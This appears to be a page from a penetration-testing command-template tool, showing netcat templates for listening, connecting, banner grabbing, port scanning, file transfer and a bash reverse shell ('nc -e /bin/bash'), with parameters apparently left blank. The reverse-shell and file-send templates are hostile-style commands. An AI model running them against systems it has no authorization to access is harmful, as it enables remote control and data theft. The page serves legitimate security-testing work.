Commander

Copy-ready command templates for common penetration testing tools. Select a tool, fill in the parameters, copy, paste, profit.

netcat

↗ docs

TCP/UDP networking Swiss army knife for reading/writing data across connections

networkingshellfile-transferlisteningpivoting

Listen on Port

Open a TCP listener on the specified port.

nc -lvnp

Connect to Host

Connect to a remote host and port.

nc

Banner Grabbing

Connect and immediately print whatever the service sends back.

nc -v

Simple Port Scan

Scan a range of ports (no data sent — zero I/O mode).

nc -zvn -

Send File

Send a file to a listening nc on the remote host.

nc <

Receiver must run: nc -lvnp {port} > received_file

Reverse Shell (Bash)

Send a bash reverse shell to a waiting listener.

nc -e /bin/bash

Set up listener first: nc -lvnp {port}. Use only on systems you own.